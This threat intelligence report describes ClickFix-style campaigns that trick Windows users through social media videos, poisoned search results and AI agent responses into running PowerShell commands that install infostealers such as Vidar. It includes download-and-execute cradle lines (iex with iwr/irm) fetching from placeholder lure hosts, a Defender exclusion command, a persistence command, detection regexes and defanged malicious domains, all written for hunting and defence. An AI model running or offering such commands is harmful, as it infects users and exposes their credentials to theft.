
The "vice" in tech advice: ClickFix-style commands disguised as tech tips across social media platforms and beyond

Threat actors are leveraging social media platforms, SEO poisoning, and AI agent responses to distribute ClickFix-style attacks disguised as tech tips. Victims are socially engineered into executing malicious PowerShell commands that initiate a fileless infection chain, bypassing traditional security controls to deploy information stealers like Vidar on their endpoints.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-04-15

Authors: Mohammad Kazem Hassan Nejad, WithSecure STINGR

Actors: ClickFix, Vidar, StealC, AuraStealer, Suspected Russian-speaking threat actor

Source: WithSecure


Key Takeaways

  • ClickFix-style attacks are heavily promoted via social media videos (TikTok, YouTube, Facebook, Instagram) disguised as tech tips.
  • The campaign uses SEO poisoning and AI agent responses to broaden its reach beyond direct social media users.
  • Victims are socially engineered into executing malicious PowerShell commands (e.g., iex and iwr/irm) that initiate a fileless infection chain.
  • The attack chain utilizes Cloudflare Pages for staging and ultimately deploys infostealers like Vidar, StealC, and AuraStealer.
  • Personal browsing and software modification attempts on corporate devices can lead to enterprise compromise.

Affected Systems

  • Windows

Attack Chain

The victim is lured via social media videos, SEO poisoned search results, or AI agent responses to execute a PowerShell command. This command fetches a fileless staging script from a first-stage domain, which verifies the User-Agent. The script then redirects to a second-stage Cloudflare Pages domain to download a payload that disables AMSI, performs anti-sandbox checks, and establishes persistence via registry Run keys or scheduled tasks. Finally, a third-stage payload, typically the Vidar infostealer, is downloaded and executed.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules or queries were provided in the article.

Detection Engineering Assessment

  • EDR Visibility: High — EDR solutions have strong visibility into PowerShell execution, AMSI bypass attempts, and registry modifications for persistence.
  • Network Visibility: Medium — Initial staging scripts are fetched over HTTP/HTTPS, but the use of legitimate services like Cloudflare Pages (*.pages.dev) may blend in with normal traffic.
  • Detection Difficulty: Moderate — While the initial execution relies on user interaction and LOLBins (PowerShell), the subsequent behaviors (AMSI tampering, Defender exclusions, Run key persistence) are highly anomalous and detectable.

Required Log Sources

  • Windows Event Log (Security)
  • PowerShell Script Block Logging (EID 4104)
  • Sysmon (EID 1, 3, 11, 12, 13)

Hunting Hypotheses

  • Hypothesis: Look for PowerShell processes executing with iex and iwr or irm commands fetching payloads from external domains, especially .dev or .run TLDs. | Telemetry: Process Creation (EID 4688) / PowerShell Script Block Logging (EID 4104) | ATT&CK Stage: Execution | FP Risk: Medium
  • Hypothesis: Monitor for PowerShell processes attempting to modify Windows Defender exclusion paths or disable AMSI. | Telemetry: Registry Modifications (Sysmon EID 12/13) / PowerShell Script Block Logging | ATT&CK Stage: Defense Evasion | FP Risk: Low
  • Hypothesis: Hunt for unexpected scheduled tasks or registry Run keys created by PowerShell processes. | Telemetry: Process Creation / Registry Modifications | ATT&CK Stage: Persistence | FP Risk: Low
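The three hunting hypotheses above, turned into runnable triage logic as an added example (not code from WithSecure or the article). It runs over constructed sample events in the shape a SIEM would normalise from PowerShell 4104 script blocks and Sysmon EID 1/13; the hostnames, registry paths and command lines in the samples are made up for illustration.

```python
import re

# Constructed sample telemetry (not from the article). Only the first three
# script blocks and the two PowerShell-spawned persistence events should fire.
SAMPLE_EVENTS = [
    {"type": "ps_scriptblock", "text": "iex (iwr https://example-lure.run/tip -UseBasicParsing)"},
    {"type": "ps_scriptblock", "text": "irm https://lib-xyz.pages.dev/s | iex"},
    {"type": "ps_scriptblock", "text": "Add-MpPreference -ExclusionPath $env:APPDATA"},
    {"type": "ps_scriptblock", "text": "Get-ChildItem C:\\Temp | Where-Object Length -gt 1MB"},
    {"type": "sysmon13", "image": "powershell.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "sysmon1", "image": "schtasks.exe", "parent": "powershell.exe",
     "cmdline": "schtasks /create /tn Updater /tr powershell.exe /sc onlogon"},
    {"type": "sysmon13", "image": "explorer.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

# Hypothesis 1: iex combined with iwr/irm (either argument or pipeline form).
DOWNLOAD_CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b"
    r"|\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b.*\|\s*(iex|invoke-expression)\b", re.I)
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# Hypothesis 2: Defender exclusion changes or AMSI tampering keywords in script blocks.
DEFENSE_EVASION = re.compile(r"(add|set)-mppreference.*-exclusionpath|amsi(utils|initfailed|scanbuffer)", re.I)
# Hypothesis 3: Run/RunOnce key writes or schtasks /create originating from PowerShell.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)

def hunt(events):
    """Return one hit per matching event, tagged with the table's stage and FP risk."""
    hits = []
    for ev in events:
        if ev["type"] == "ps_scriptblock":
            text = ev["text"]
            if DOWNLOAD_CRADLE.search(text):
                hosts = URL_HOST.findall(text)
                # .dev/.run TLDs (e.g. Cloudflare Pages *.pages.dev) are the campaign's staging hosts
                risky = any(h.lower().endswith((".dev", ".run")) for h in hosts)
                hits.append({"stage": "Execution", "fp_risk": "Medium", "risky_tld": risky, "evidence": text})
            if DEFENSE_EVASION.search(text):
                hits.append({"stage": "Defense Evasion", "fp_risk": "Low", "risky_tld": False, "evidence": text})
        elif ev["type"] == "sysmon13" and ev["image"].lower() == "powershell.exe" and RUN_KEY.search(ev["target"]):
            hits.append({"stage": "Persistence", "fp_risk": "Low", "risky_tld": False, "evidence": ev["target"]})
        elif (ev["type"] == "sysmon1" and ev.get("parent", "").lower() == "powershell.exe"
              and ev["image"].lower() == "schtasks.exe" and "/create" in ev["cmdline"].lower()):
            hits.append({"stage": "Persistence", "fp_risk": "Low", "risky_tld": False, "evidence": ev["cmdline"]})
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f'[{hit["stage"]}/FP {hit["fp_risk"]}] risky_tld={hit["risky_tld"]}: {hit["evidence"]}')
```

In production the "Execution" hypothesis is the noisy one (admins do use iwr | iex), so the risky_tld flag is what should drive escalation rather than the cradle match alone.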

Control Gaps

  • Web filtering (Cloudflare Pages often allowed)
  • Endpoint AV (fileless execution evades traditional disk-based signatures)

Key Behavioral Indicators

  • PowerShell User-Agent strings in web proxy logs
  • PowerShell executing iex with web requests
  • Modifications to Defender exclusion registry keys

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block known malicious domains and Cloudflare Pages URLs associated with this campaign.
  • Hunt for execution of the identified PowerShell commands (iex/iwr/irm) in endpoint telemetry.

Infrastructure Hardening

  • Enable and monitor PowerShell Script Block Logging.
  • Restrict PowerShell execution policies for standard users.
  • Implement strict web filtering for newly registered or uncategorized domains.

User Protection

  • Deploy EDR solutions configured to block AMSI tampering and unauthorized Defender exclusions.
  • Restrict user permissions to prevent unauthorized registry modifications and scheduled task creation.

Security Awareness

  • Educate employees on the risks of executing commands found in social media videos, AI responses, or unofficial forums.
  • Enforce policies against using corporate devices for personal social media browsing or unauthorized software activation.

MITRE ATT&CK Mapping

  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1204.002 - User Execution: Malicious File
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1497.001 - Virtualization/Sandbox Evasion: System Checks
  • T1053.005 - Scheduled Task/Job: Scheduled Task
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Additional IOCs

  • Domains:
    • msact[[.]]run - First-stage domain used in lure videos
    • wslm[[.]]net - First-stage domain used in lure videos
    • slmgr[[.]]win - First-stage domain used in lure videos
    • slmgr[[.]]ws - First-stage domain used in lure videos
    • slmgr[[.]]sh - First-stage domain used in lure videos
    • msauth[[.]]cc - First-stage domain used in lure videos
    • msauth[[.]]in - First-stage domain used in lure videos
    • activepro[[.]]cc - First-stage domain used in lure
    • keytool[[.]]cc - First-stage domain used in lure
    • activated[[.]]sh - First-stage domain used in lure
    • activator[[.]]tools - First-stage domain used in lure
    • debloat[.]io - Domain used in Google Sponsored ads for fake debloat tool
    • lib-9ab[.]pages[[.]]dev - Second-stage domain used to fetch payload script
    • lib-2j8[.]pages[[.]]dev - Second-stage domain used to fetch payload script
    • settingss[.]pages[.]dev - Second-stage domain used to fetch payload script
    • settings-4av[.]pages[[.]]dev - Second-stage domain used to fetch payload script
    • installsh[.]pages[[.]]dev - Second-stage domain used to fetch payload script
    • cdn-4gp[.]pages[[.]]dev - Second-stage domain used to fetch payload script
    • settings-320[.]pages[.]dev - Second-stage domain used to fetch payload script
    • file-epq[.]pages[[.]]dev - Third-stage domain hosting final payload
    • install-5yq[.]pages[[.]]dev - Third-stage domain hosting final payload
    • crypted[.]pages[.]dev - Third-stage domain hosting final payload
    • cdn-27z[.]pages[[.]]dev - Third-stage domain hosting final payload
    • process-e7b[.]pages[[.]]dev - Third-stage domain hosting final payload
    • backup-5de[.]pages[[.]]dev - Third-stage domain hosting final payload
    • jacrcell[[.]]com - Third-stage domain hosting final payload
    • tranquilityparadise[.]com[[.]]np - Third-stage domain hosting final payload
    • tmopgm[.]org[[.]]ng - Third-stage domain hosting final payload
    • ravenfootballclub[[.]]com - Third-stage domain hosting final payload
    • py-3ow[.]pages[[.]]dev - Third-stage domain hosting final payload
  • File Hashes:
  • Command Lines:
    • Purpose: Initial execution of fileless staging script via web request | Tools: PowerShell | Stage: Initial Access / Execution | iex (iwr ...)
    • Purpose: Initial execution of fileless staging script via web request (alias variation) | Tools: PowerShell | Stage: Initial Access / Execution | iex (irm ...)
  • Other:
    • @windows.tips1 - TikTok user posting lure videos
    • @msauth49 - TikTok user posting lure videos
    • @slmgr-sh - YouTube user posting lure videos
    • @multicorecc - YouTube user posting lure videos
    • wtips404 - Instagram user posting lure videos
    • wndwstips - Instagram user posting lure videos
    • tipstalkai - Instagram user posting lure videos
    • msauthcc - Instagram user posting lure videos